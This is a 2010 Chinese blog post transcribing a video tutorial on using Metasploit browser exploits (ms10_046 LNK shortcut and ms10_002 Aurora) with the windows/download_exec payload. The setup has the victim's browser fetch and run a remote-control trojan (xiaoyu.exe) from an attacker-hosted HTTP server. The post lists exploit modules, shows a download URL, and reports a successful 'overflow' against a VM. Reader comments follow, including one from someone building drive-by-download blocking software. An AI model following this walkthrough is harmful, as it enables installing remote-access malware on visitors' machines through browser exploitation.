Metasploit中windows/browser/ms10_002_aurora利用

2010-10-1 王健宇 视频教程

在线观看地址:http://www.9170.org/http.htm

=========================================

首先我们打开Metasploit
启动有点慢,我们先配置好远控的服务端。
好了,xiaoyu.exe是我们的服务端。
等下溢出成功要给他自己下载运行的,架设一个http的下载
改一下端口。

好了。开始了!show exploits查看一下有哪些漏洞可以来利用!由于是网页挂马来溢出攻击,所以要找browser的
   windows/browser/ms10_002_aurora                                normal     Internet Explorer "Aurora" Memory Corruption
   windows/browser/ms10_018_ie_behaviors                          good       Internet Explorer DHTML Behaviors Use After Free
   windows/browser/ms10_018_ie_tabular_activex                    good       Internet Explorer Tabular Data Control ActiveX Memory Corruption
   windows/browser/ms10_022_ie_vbscript_winhlp32                  great      Internet Explorer Winhlp32.exe MsgBox Code Execution
   windows/browser/ms10_042_helpctr_xss_cmd_exec                  excellent  Microsoft Help Center XSS and Command Execution
   windows/browser/ms10_046_shortcut_icon_dllloader               excellent  Microsoft Windows Shell LNK Code Execution
   windows/browser/msvidctl_mpeg2                                 normal     Microsoft DirectShow (msvidctl.dll) MPEG-2 Memory Corruption
这些都是最近爆的漏洞,拿来利用比较好。
我这个教程就选用windows/browser/ms10_046_shortcut_icon_dllloader
这个是快捷方式的漏洞。。。这个漏洞的说明可以去百度查找的
===============================================
show payloads查看一下,这些都是payload,配合挂马的话
windows/download_exec                            normal  Windows Executable Download and Execute
就用这个,下载的
这个URL填写我们本地架设的这个。
好了,exploit,漏洞开始利用了![*] Server started.
我们在虚拟机打开看看!晕了,没成功,以前反弹过了,换个溢出漏洞试试
 192.168.0.55:8080/123.exe
原来如此。。。这个URL我刚才填错了IP地址
还是重新打开用那个漏洞。。起了冲突
metasploit很好,但就是安装,启动,太慢了!
浪费了很多时间。。。。。。。。。。。。。。
我发誓以后再也不用这个漏洞了!!!
用这个windows/browser/ms10_002_aurora
再来演示一次
10:24:10 192.168.6.12:1058 完成下载 - 740.00 KB @ 1348
溢出成功!!呵呵

教程到此结束,谢谢大家观看!
=========================================================

标签: metasploit ms10_046_shortcut_icon_dllloader ms10_002_aurora windows/download_exec

« 【国庆献礼】QQ显IP攻击对方掉线的教程 | 如今的360杀毒软件真让人无语!»

评论:


2012-03-17 21:21
我们先配置好远控的服务端  和  好了,xiaoyu.exe是我们的服务端
这两句话什么意思呢?
回复
王健宇
2012-03-18 14:13
@李:。。。自己理解一下
回复

2012-03-17 21:18
看了你这个视频,了解了很多,对我帮助也很大。但是我还是有些地方不明白呢。那个url是真需要搭建一个服务器吗?  你那个exe文件是什么意思?
我也是搞安全的,做了一个阻止浏览器悄悄下载(drive-by download)的软件。但现在没有测试集,后来发现了metasploit,感觉不错。现在呢我就准备用这个工具自己搭建一个悄悄下载的攻击,看能不能拦截到。可不明白应该怎么搭建。
回复
王健宇
2012-03-18 14:13
@李:这个应该拦截不到的
回复

发表评论:

Powered by emlog sitemap